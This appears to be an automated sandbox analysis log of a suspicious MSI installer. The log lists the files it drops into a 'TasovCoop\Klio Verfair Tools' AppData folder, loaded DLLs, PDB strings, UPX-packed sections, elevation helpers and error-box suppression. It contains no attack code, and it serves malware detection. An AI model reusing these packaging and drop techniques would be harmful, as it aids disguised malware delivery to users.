    Source: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exeSection loaded: dwmapi.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exeSection loaded: dbghelp.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exeSection loaded: dbgcore.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exeSection loaded: msimg32.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exeSection loaded: windowscodecs.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exeSection loaded: textshaping.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exeSection loaded: dwrite.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
    Source: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exeWindow found: window name: SysTabControl32Jump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: build.msiStatic file information: File size 65046016 > 1048576
    Source: Binary string: C:\ReleaseAI\win\Release\bin\x86\embeddeduiproxy.pdb= source: build.msi
    Source: Binary string: c:\repos\clink\.build\release\~working\.build\vs2019\bin\final\clink_dll_x86.pdb source: clink_dll_x86.dll.4.dr
    Source: Binary string: ucrtbase.pdb source: build.msi
    Source: Binary string: C:\projects\src\out\Default\ffmpeg.dll.pdb source: ffmpeg.dll.4.dr
    Source: Binary string: Microsoft.Web.WebView2.Core.pdbGCTL source: build.msi
    Source: Binary string: d:\build\ob\bora-16964525\cayman_libsigcpp2\libsigcpp2\src\MSVC_Net2015\Win32\Release\sigc-2.0.pdb## source: sigc-2.0.dll.4.dr
    Source: Binary string: C:\ReleaseAI\win\Release\WinUiBootstrapperEui\WinUiBootstrapperEui.pdb source: build.msi
    Source: Binary string: Unable to get temp pathcopy_dllclink\dll_cache\1.4.6.8b1dec_%08xUnable to create path '%s'\clink_dll_x64.dll.originFailed to create origin file at '%s'Failed to copy DLL to '%s'.pdbUnable to get DLL version for '%s'check_dll_version\Unable to query DLL version info for '%s'DLL version: %08x %08x%s%swait_monitor::on_waited source: clink_dll_x64.dll.4.dr
    Source: Binary string: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\crashinfo\libmupdf.pdb source: launcher.exe, 00000009.00000002.2597059561.000001D54B1E8000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: libmupdf.pdb source: launcher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmp
    Source: Binary string: D:\a\_work\1\s\140_release\vcrt_fwd_x86_release\Release\msvcp140_app.pdb source: build.msi
    Source: Binary string: Bookmark Shortcuts%.2flnkfitwidthfitpage"%s" -page %d -view "%s" -zoom %s -scroll %d,%dfitcontentSelect folder with PDF filesBookmark shortcut to page %s of %s*.xps;*.oxps*.pdf*.ps;*.eps*.djvu*.chm*.cbz;*.cbr;*.cb7;*.cbt*.svgSVG documents*.mobi*.epub*.pdb;*.prc*.fb2;*.fb2z;*.zfb2;*.fb2.zip*.bmp;*.dib;*.gif;*.jpg;*.jpeg;*.jxr;*.png;*.tga;*.tif;*.tiff;*.webp;*.heic;*.avifImagesAll supported documents*.txt;*.log;*.nfo;file_id.diz;read.me;*.tcrVK_DOWN source: launcher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmp
    Source: Binary string: SumatraPDF-dll.pdb source: launcher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmp
    Source: Binary string: E:\BA\201\s\140_release\vcrt_fwd_x86_release\Release\vcomp140_app.pdb source: build.msi
    Source: Binary string: D:\a\1\s\Win32\Release\Microsoft.Toolkit.Win32.UI.XamlApplication\Microsoft.Toolkit.Win32.UI.XamlHost.pdb!! source: build.msi
    Source: Binary string: C:\Users\kjk\src\sumatrapdf\out\rel64\SumatraPDF.pdb source: launcher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmp
    Source: Binary string: -64.pdb.lzsa source: launcher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmp
    Source: Binary string: </html>.pdb<<html> source: launcher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmp
    Source: Binary string: D:\a\1\s\Win32\Release\Microsoft.Toolkit.Win32.UI.XamlApplication\Microsoft.Toolkit.Win32.UI.XamlHost.pdb source: build.msi
    Source: Binary string: C:\projects\src\out\Default\vk_swiftshader.dll.pdb source: vk_swiftshader.dll.4.dr
    Source: Binary string: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\crashinfo\SumatraPDF-dll.pdb source: launcher.exe, 00000009.00000002.2597059561.000001D54B1E0000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: Microsoft.Web.WebView2.Core.pdb source: build.msi
    Source: Binary string: ucrtbase.pdbUGP source: build.msi
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: build.msi, MSI6E8B.tmp.4.dr, MSI6501.tmp.4.dr
    Source: Binary string: ITSF.txt.js.json.xml.logfile_id.dizread.me.nfo.tcr.ps.ps.gz.eps.fb2.fb2z.fbz.zfb2.fb2.zip.cbz.cbr.cb7.cbt.pdf.xps.oxps.chm.png.jpg.jpeg.gif.tif.tiff.bmp.tga.jxr.hdp.wdp.webp.epub.mobi.prc.azw.azw1.azw3.pdb.html.htm.xhtml.svg.djvu.jp2.zip.rar.7z.heic.avif.tarfoo.epubfoo.JP2Rar! source: launcher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmp
    Source: Binary string: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\crashinfo\SumatraPDF.pdb source: launcher.exe, 00000009.00000002.2597059561.000001D54B1E8000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: C:\Dev\elevate\bin\x86\Release\Elevate.pdb source: elevate.exe.4.dr
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\DataUploader.pdb source: build.msi
    Source: Binary string: C:\ReleaseAI\win\Release\WinUiBootstrapperEui\WinUiBootstrapperEui.pdb)) source: build.msi
    Source: Binary string: d:\build\ob\bora-16964525\cayman_libsigcpp2\libsigcpp2\src\MSVC_Net2015\Win32\Release\sigc-2.0.pdb source: sigc-2.0.dll.4.dr
    Source: Binary string: c:\repos\clink\.build\release\~working\.build\vs2019\bin\final\clink_dll_x64.pdb source: clink_dll_x64.dll.4.dr
    Source: Binary string: Unable to get temp pathcopy_dllclink\dll_cache\1.4.6.8b1dec_%08xUnable to create path '%s'\clink_dll_x86.dll.originFailed to create origin file at '%s'Failed to copy DLL to '%s'.pdbUnable to get DLL version for '%s'check_dll_version\Unable to query DLL version info for '%s'DLL version: %08x %08x%s%swait_monitor::on_waited source: clink_dll_x86.dll.4.dr
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\DataUploader.pdbj source: build.msi
    Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: build.msi
    Source: Binary string: E:\BA\201\s\140_release\vcrt_fwd_x86_release\Release\vcamp140_app.pdb source: build.msi
    Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdbGCTL source: build.msi
    Source: Binary string: E:\BA\201\s\140_release\vcrt_fwd_x86_release\Release\vccorlib140_app.pdb source: build.msi
    Source: Binary string: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\crashinfo\libmupdf.pdbK_ source: launcher.exe, 00000009.00000002.2597059561.000001D54B1E8000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\crashinfo\SumatraPDF-dll.pdbo Verfa source: launcher.exe, 00000009.00000002.2597059561.000001D54B1E0000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\stubs\x86\ExternalUi.pdb source: build.msi
    Source: Binary string: D:\build\ob\bora-21139696\bora\build\build\LIBRARIES\adjperm\win32\release\adjperm.pdb source: adjperm.dll.4.dr
    Source: Binary string: https://www.sumatrapdfreader.org/dl/rel/SumatraPDF-3.5.2-64.pdb.lzsaI source: launcher.exe, 00000009.00000002.2597059561.000001D54B1E8000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: https://www.sumatrapdfreader.org/dl/rel/SumatraPDF-3.5.2-64.pdb.lzsa source: launcher.exe, 00000009.00000002.2597059561.000001D54B1E8000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: C:\a\_work\1\s\BuildOutput\Release\x86\Microsoft.UI.Xaml\Microsoft.UI.Xaml.pdb source: build.msi
    Source: Binary string: D:\a\_work\1\s\140_release\vcrt_fwd_x86_release\Release\vcruntime140_app.pdb source: build.msi
    Source: Binary string: SumatraPDF.pdb source: launcher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\bin\x86\embeddeduiproxy.pdb source: build.msi
    Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: build.msi
    Source: Binary string: SumatraPDF.pdbSumatraPDF-dll.pdblibmupdf.pdbInstallCrashHandler: skipping because !crashDumpPath source: launcher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmp
    Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdbGCTL source: build.msi
    Source: launcher.exe.4.drStatic PE information: section name: _RDATA
    Source: libssl-1_1-x64.dll.4.drStatic PE information: section name: .00cfg
    Source: vk_swiftshader.dll.4.drStatic PE information: section name: .gxfg
    Source: vk_swiftshader.dll.4.drStatic PE information: section name: .retplne
    Source: vk_swiftshader.dll.4.drStatic PE information: section name: _RDATA
    Source: vulkan-1.dll.4.drStatic PE information: section name: .gxfg
    Source: vulkan-1.dll.4.drStatic PE information: section name: .retplne
    Source: vulkan-1.dll.4.drStatic PE information: section name: _RDATA
    Source: clink_dll_x64.dll.4.drStatic PE information: section name: _RDATA
    Source: clink_dll_x64.dll.4.drStatic PE information: section name: .detourc
    Source: clink_dll_x64.dll.4.drStatic PE information: section name: .detourd
    Source: clink_dll_x86.dll.4.drStatic PE information: section name: .detourc
    Source: clink_dll_x86.dll.4.drStatic PE information: section name: .detourd
    Source: ffmpeg.dll.4.drStatic PE information: section name: .gxfg
    Source: ffmpeg.dll.4.drStatic PE information: section name: .retplne
    Source: ffmpeg.dll.4.drStatic PE information: section name: _RDATA
    Source: libEGL.dll.4.drStatic PE information: section name: .gxfg
    Source: libEGL.dll.4.drStatic PE information: section name: .retplne
    Source: libEGL.dll.4.drStatic PE information: section name: _RDATA
    Source: libGLESv2.dll.4.drStatic PE information: section name: .gxfg
    Source: libGLESv2.dll.4.drStatic PE information: section name: .retplne
    Source: libGLESv2.dll.4.drStatic PE information: section name: _RDATA
    Source: MSI6389.tmp.4.drStatic PE information: section name: .fptable
    Source: MSI6501.tmp.4.drStatic PE information: section name: .fptable
    Source: MSI6560.tmp.4.drStatic PE information: section name: .fptable
    Source: MSI659F.tmp.4.drStatic PE information: section name: .fptable
    Source: MSI65EE.tmp.4.drStatic PE information: section name: .fptable
    Source: MSI6E8B.tmp.4.drStatic PE information: section name: .fptable
    Source: initial sampleStatic PE information: section name: UPX0
    Source: initial sampleStatic PE information: section name: UPX1
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\gmodule-2.0.dllJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\vmclientcore.dllJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6E8B.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\resources\extras\clink\clink_dll_x86.dllJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\TPClntloc.dllJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\vmnetBridge.dllJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\vmeventmsg.dllJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\resources\elevate.exeJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\7z.exeJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\resources\extras\clink\clink_x64.exeJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\ffmpeg.dllJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\libEGL.dllJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\adjperm.dllJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\zlib1.dllJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6389.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\sigc-2.0.dllJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\resources\extras\UAC.exeJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\TPClntjpn.dllJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI65EE.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\mksSandbox.exeJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\libssl-1_1-x64.dllJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\rufus-4.6p.exeJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\resources\extras\clink\clink_x86.exeJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\d3dcompiler_47.dllJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\gthread-2.0.dllJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6501.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exeJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\libcds.dllJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\basichttp.dllJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\libGLESv2.dllJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6560.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\vk_swiftshader.dllJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\TPClntdeu.dllJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\7z.dllJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\vmauthd.dllJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI659F.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\resources\extras\clink\clink_dll_x64.dllJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\vulkan-1.dllJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6E8B.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6501.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6560.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6389.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI659F.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI65EE.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\LICENSE.electron.txtJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\gmodule-2.0.dllJump to dropped file
    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\vmclientcore.dllJump to dropped file
    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI6E8B.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\resources\extras\clink\clink_dll_x86.dllJump to dropped file
